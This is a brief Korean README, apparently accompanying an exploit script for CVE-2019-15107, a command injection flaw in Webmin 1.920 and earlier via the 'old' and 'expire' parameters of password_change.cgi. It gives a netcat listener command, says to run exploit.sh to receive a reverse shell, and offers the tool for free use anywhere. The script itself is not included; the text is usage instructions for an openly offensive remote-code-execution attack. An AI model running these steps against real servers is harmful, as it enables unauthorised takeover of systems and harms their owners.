
webmin <=1.920 - 명령 삽입 취약점을 통한 원격 코드 실행(RCE)
https://www.cvedetails.com/cve/CVE-2019-15107/
Webmin <=1.920에서 문제가 발견되었습니다. password_change.cgi의 "old" 및 "expire" 매개변수에 명령 주입 취약점이 존재합니다.
rlwrap -cAr nc -lvp 1919
./exploit.sh
실행시키면 리스너에서 리버스 셸을 받게 됩니다.

원할 때 언제 어디서나 자유롭게 사용하거나 수정할 수 있습니다.